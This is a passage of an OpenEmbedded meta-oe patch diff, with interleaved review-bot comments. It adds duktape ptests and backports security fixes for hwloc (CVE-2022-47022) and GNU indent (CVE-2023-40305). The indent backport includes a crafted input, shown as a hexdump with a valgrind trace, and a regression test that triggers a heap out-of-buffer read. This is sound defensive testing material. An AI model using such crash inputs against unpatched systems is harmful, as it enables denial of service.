@@ -18,6 +18,7 @@ SRC_URI = "git://github.com/GENIVI/${BPN}.git;protocol=https;branch=master \ file://0002-Don-t-execute-processes-as-a-specific-user.patch \ file://0004-Modify-systemd-config-directory.patch \ file://0001-cmake-Link-with-libatomic-on-rv32-rv64.patch \ + file://0001-Fix-memory-leak.patch \ " SRCREV = "6a3bd901d825c7206797e36ea98e10a218f5aad2" diff --git a/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb b/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb index 7674785437..583e8337e7 100644 --- a/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb +++ b/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb @@ -4,7 +4,11 @@ HOMEPAGE = "https://duktape.org" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b7825df97b52f926fc71300f7880408" -SRC_URI = "https://duktape.org/duktape-${PV}.tar.xz" +SRC_URI = "https://duktape.org/duktape-${PV}.tar.xz \ + file://run-ptest \ + " +inherit ptest + SRC_URI[sha256sum] = "90f8d2fa8b5567c6899830ddef2c03f3c27960b11aca222fa17aa7ac613c2890" EXTRA_OEMAKE = "INSTALL_PREFIX='${prefix}' DESTDIR='${D}' LIBDIR='/${baselib}'" 
@@ -13,8 +17,24 @@ do_compile () { oe_runmake -f Makefile.sharedlibrary INSTALL_PREFIX="${prefix}" DESTDIR="${D}" } +do_compile_ptest() { + oe_runmake -f Makefile.hello INSTALL_PREFIX="${prefix}" DESTDIR="${D}" + oe_runmake -f Makefile.eval INSTALL_PREFIX="${prefix}" DESTDIR="${D}" + oe_runmake -f Makefile.eventloop INSTALL_PREFIX="${prefix}" DESTDIR="${D}" +} + do_install () { oe_runmake -f Makefile.sharedlibrary INSTALL_PREFIX="${prefix}" DESTDIR="${D}" install # libduktaped is identical to libduktape but has an hard-coded -g build flags, remove it rm -f ${D}${libdir}/libduktaped.so* } + +do_install_ptest() { + install -m 0755 "${WORKDIR}/duktape-2.7.0/hello" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/eval" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/evloop" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/examples/eventloop/timer-test.js" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/examples/eventloop/ecma_eventloop.js" "${D}${PTEST_PATH}" +} + +RDEPENDS_${PN}-ptest += "make" diff --git a/meta-oe/recipes-extended/duktape/files/run-ptest b/meta-oe/recipes-extended/duktape/files/run-ptest new file mode 100644 index 0000000000..852fb15de4 --- /dev/null +++ b/meta-oe/recipes-extended/duktape/files/run-ptest @@ -0,0 +1,32 @@ +#!/bin/sh + +./hello &> $test.output 2>&1 +out="Hello world!" + +if grep -i "$out" $test.output 2>&1 ; then + echo "PASS: Hello duktape" +else + echo "FAIL: Hello duktape" +fi +rm -f $test.output + +./eval "print('Hello world!'); 123;" > out.log + +sed -n '2p' out.log > eval.log +sed -n '3p' out.log >> eval.log + +if grep -w 'Hello world!\|123' eval.log 2>&1; then + echo "PASS: eval duktape" +else + echo "FAIL: eval duktape" +fi +rm -f eval.log out.log + +./evloop timer-test.js > evloop.log 2>&1 + +if grep -i "no active timers and no sockets to poll" evloop.log 2>&1; then + echo "PASS: evloop duktape" +else + echo "FAIL: evloop duktape" +fi +rm -f evloop.log 
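Review bot: `RDEPENDS_${PN}-ptest += "make"` uses the underscore override form, while the other recipes touched by this commit use colons (`RDEPENDS:${PN}`, `FILES:${PN}-dev`). On a branch with the colon syntax the line should read `RDEPENDS:${PN}-ptest += "make"`, otherwise the dependency will probably not be applied. The run-ptest script added alongside never calls make, so the dependency may not be needed at all. In do_install_ptest the five `install` lines hard-code `${WORKDIR}/duktape-2.7.0/`; using `${S}/hello` and so on would follow the recipe version.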
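Review bot: The first check in run-ptest runs `./hello &> $test.output 2>&1` under `#!/bin/sh`, but `&>` is a bash extension. A strictly POSIX shell reads it as `./hello &` followed by a separate redirection, so depending on the target's /bin/sh the grep can run before the program has written anything. `$test` is never set, so the file is just `.output`. Using `./hello > hello.log 2>&1`, with the grep and `rm -f` pointed at `hello.log`, avoids both problems. The eval check uses `grep -w 'Hello world!\|123'`, which passes when only one of the two expected lines is present.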
diff --git a/meta-oe/recipes-extended/hwloc/files/CVE-2022-47022.patch b/meta-oe/recipes-extended/hwloc/files/CVE-2022-47022.patch
new file mode 100644
index 0000000000..bfeb9b405d
--- /dev/null
+++ b/meta-oe/recipes-extended/hwloc/files/CVE-2022-47022.patch
@@ -0,0 +1,77 @@
+From ac1f8db9a0790d2bf153711ff4cbf6101f89aace Mon Sep 17 00:00:00 2001
+From: Brice Goglin <Brice.Goglin@inria.fr>
+Date: Wed, 23 Aug 2023 19:52:47 +0200
+Subject: [PATCH] linux: handle glibc cpuset allocation failures
+
+Closes #544
+CVE-2022-47022
+
+Signed-off-by: Brice Goglin <Brice.Goglin@inria.fr>
+
+CVE: CVE-2022-47022
+
+Upstream-Status: Backport [https://github.com/open-mpi/hwloc/commit/ac1f8db9a0790d2bf153711ff4cbf6101f89aace]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/topology-linux.c | 15 ++++++++++++++-
+ 1 file changed, 14 insertions(+), 1 deletion(-)
+
+diff --git a/src/topology-linux.c b/src/topology-linux.c
+index 62c3b44..86be150 100644
+--- a/src/topology-linux.c
++++ b/src/topology-linux.c
+@@ -623,6 +623,8 @@ hwloc_linux_set_tid_cpubind(hwloc_topology_t topology __hwloc_attribute_unused,
+
+ setsize = CPU_ALLOC_SIZE(last+1);
+ plinux_set = CPU_ALLOC(last+1);
++ if (!plinux_set)
++ return -1;
+
+ CPU_ZERO_S(setsize, plinux_set);
+ hwloc_bitmap_foreach_begin(cpu, hwloc_set)
+@@ -703,7 +705,10 @@ hwloc_linux_find_kernel_nr_cpus(hwloc_topology_t topology)
+ while (1) {
+ cpu_set_t *set = CPU_ALLOC(nr_cpus);
+ size_t setsize = CPU_ALLOC_SIZE(nr_cpus);
+- int err = sched_getaffinity(0, setsize, set); /* always works, unless setsize is too small */
++ int err;
++ if (!set)
++ return -1; /* caller will return an error, and we'll try again later */
++ err = sched_getaffinity(0, setsize, set); /* always works, unless setsize is too small */
+ CPU_FREE(set);
+ nr_cpus = setsize * 8; /* that's the value that was actually tested */
+ if (!err)
+@@ -732,8 +737,12 @@ hwloc_linux_get_tid_cpubind(hwloc_topology_t topology __hwloc_attribute_unused,
+
+ /* find the kernel nr_cpus so as to use a large enough cpu_set size */
+ kernel_nr_cpus = hwloc_linux_find_kernel_nr_cpus(topology);
++ if (kernel_nr_cpus < 0)
++ return -1;
+ setsize = CPU_ALLOC_SIZE(kernel_nr_cpus);
+ plinux_set = CPU_ALLOC(kernel_nr_cpus);
++ if
(!plinux_set) ++ return -1; + + err = sched_getaffinity(tid, setsize, plinux_set); + +@@ -1092,6 +1101,8 @@ hwloc_linux_set_thread_cpubind(hwloc_topology_t topology, pthread_t tid, hwloc_c + + setsize = CPU_ALLOC_SIZE(last+1); + plinux_set = CPU_ALLOC(last+1); ++ if (!plinux_set) ++ return -1; + + CPU_ZERO_S(setsize, plinux_set); + hwloc_bitmap_foreach_begin(cpu, hwloc_set) +@@ -1184,6 +1195,8 @@ hwloc_linux_get_thread_cpubind(hwloc_topology_t topology, pthread_t tid, hwloc_b + + setsize = CPU_ALLOC_SIZE(last+1); + plinux_set = CPU_ALLOC(last+1); ++ if (!plinux_set) ++ return -1; + + err = pthread_getaffinity_np(tid, setsize, plinux_set); + if (err) { +-- +2.40.0 diff --git a/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb b/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb index e6fed584f9..83c85dbe3e 100644 --- a/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb +++ b/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb @@ -7,7 +7,9 @@ SECTION = "base" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=3282e20dc3cec311deda3c6d4b1f990b" -SRC_URI = "https://www.open-mpi.org/software/${BPN}/v1.11/downloads/${BP}.tar.bz2" +SRC_URI = "https://www.open-mpi.org/software/${BPN}/v1.11/downloads/${BP}.tar.bz2 \ + file://CVE-2022-47022.patch \ + " SRC_URI[md5sum] = "3c792e23c209e9e1bafe9bdbc613d401" SRC_URI[sha256sum] = "a4494b7765f517c0990d1c7f09d98cb87755bb6b841e4e2cbfebca1b14bac9c8" diff --git a/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0001.patch b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0001.patch new file mode 100644 index 0000000000..367202e3c5 --- /dev/null +++ b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0001.patch 
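Review bot: hwloc_linux_find_kernel_nr_cpus can now return -1 when CPU_ALLOC fails, and the backport adds the matching `if (kernel_nr_cpus < 0) return -1;` only in hwloc_linux_get_tid_cpubind. Any other caller of that function in the 1.11.13 topology-linux.c, which these hunks do not show, would pass the negative value on to CPU_ALLOC_SIZE and CPU_ALLOC and needs the same check; please confirm there is none. Each of the five patched functions continues outside its hunk.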
@@ -0,0 +1,4196 @@ +From df4ab2d19e247d059e0025789ba513418073ab6f Mon Sep 17 00:00:00 2001 +From: Petr Písař <ppisar@redhat.com> +Date: Thu, 19 Oct 2023 07:36:32 +0000 +Subject: [PATCH] Fix an out-of-buffer read in search_brace()/lexi() on an + condition without parentheses followed with an overlong comment +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Reproducer: + +$ hexdump -C /tmp/short +00000000 69 66 20 30 3b 65 6c 73 65 2f 2a 0a 0a 0a 0a 0a |if 0;else/*.....| +00000010 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a |................| +* +00000800 0a 0a 2a 2f 78 0a |..*/x.| +00000806 + +$ valgrind -- ./indent -o /dev/null /tmp/short +[...] +==21830== Invalid read of size 1 +==21830== at 0x40586A: lexi (lexi.c:251) +==21830== by 0x40198C: search_brace (indent.c:387) +==21830== by 0x401CC2: indent_main_loop (indent.c:548) +==21830== by 0x402298: indent (indent.c:758) +==21830== by 0x402941: indent_single_file (indent.c:1003) +==21830== by 0x402A0F: indent_all (indent.c:1041) +==21830== by 0x402BC5: main (indent.c:1122) +==21830== Address 0x4ab2210 is 0 bytes inside a block of size 2,048 free'd +==21830== at 0x4847A40: realloc (vg_replace_malloc.c:1649) +==21830== by 0x408BC0: xrealloc (globs.c:64) +==21830== by 0x40BF03: need_chars (handletoken.c:89) +==21830== by 0x401433: sw_buffer (indent.c:149) +==21830== by 0x401973: search_brace (indent.c:380) +==21830== by 0x401CC2: indent_main_loop (indent.c:548) +==21830== by 0x402298: indent (indent.c:758) +==21830== by 0x402941: indent_single_file (indent.c:1003) +==21830== by 0x402A0F: indent_all (indent.c:1041) +==21830== by 0x402BC5: main (indent.c:1122) +==21830== Block was alloc'd at +==21830== at 0x4847A40: realloc (vg_replace_malloc.c:1649) +==21830== by 0x408BC0: xrealloc (globs.c:64) +==21830== by 0x40BF03: need_chars (handletoken.c:89) +==21830== by 0x401696: search_brace (indent.c:281) +==21830== by 0x401CC2: indent_main_loop (indent.c:548) +==21830== by 
0x402298: indent (indent.c:758) +==21830== by 0x402941: indent_single_file (indent.c:1003) +==21830== by 0x402A0F: indent_all (indent.c:1041) +==21830== by 0x402BC5: main (indent.c:1122) + +The cause was that need_chars(&save_com, ...) could reallocate save_com.ptr +pointer keeping a dangling copy of that pointer saved to buf_ptr +a line above. + +Related to CVE-2023-40305 + +Signed-off-by: Petr Písař <ppisar@redhat.com> + +CVE: CVE-2023-40305 + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/indent.git/commit/?id=df4ab2d19e247d059e0025789ba513418073ab6f] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + regression/TEST | 3 +- + regression/input/comment-heap-overread.c | 2040 ++++++++++++++++++ + regression/standard/comment-heap-overread.c | 2042 +++++++++++++++++++ + src/indent.c | 2 +- + 4 files changed, 4085 insertions(+), 2 deletions(-) + create mode 100644 regression/input/comment-heap-overread.c + create mode 100644 regression/standard/comment-heap-overread.c + +diff --git a/regression/TEST b/regression/TEST +index 56f41d9..a7a6747 100755 +--- a/regression/TEST ++++ b/regression/TEST +@@ -37,7 +37,8 @@ BUGS="case-label.c one-line-1.c one-line-2.c one-line-3.c \ + one-line-4.c struct-decl.c sizeof-in-while.c line-break-comment.c \ + macro.c enum.c elif.c nested.c wrapped-string.c minus_predecrement.c \ + bug-gnu-33364.c float-constant-suffix.c block-comments.c \ +- no-forced-nl-in-block-init.c hexadecimal_float.c" ++ no-forced-nl-in-block-init.c hexadecimal_float.c \ ++ comment-heap-overread.c" + + INDENTSRC="args.c backup.h backup.c dirent_def.h globs.c indent.h \ + indent.c indent_globs.h io.c lexi.c memcpy.c parse.c pr_comment.c \ +diff --git a/regression/input/comment-heap-overread.c b/regression/input/comment-heap-overread.c +new file mode 100644 +index 0000000..5b0b172 +--- /dev/null ++++ b/regression/input/comment-heap-overread.c +@@ -0,0 +1,2040 @@ ++if 0;else/* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++*/x +diff --git a/regression/standard/comment-heap-overread.c b/regression/standard/comment-heap-overread.c +new file mode 100644 +index 0000000..e601fb4 +--- /dev/null ++++ b/regression/standard/comment-heap-overread.c +@@ -0,0 +1,2042 @@ ++if 0; ++else /* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
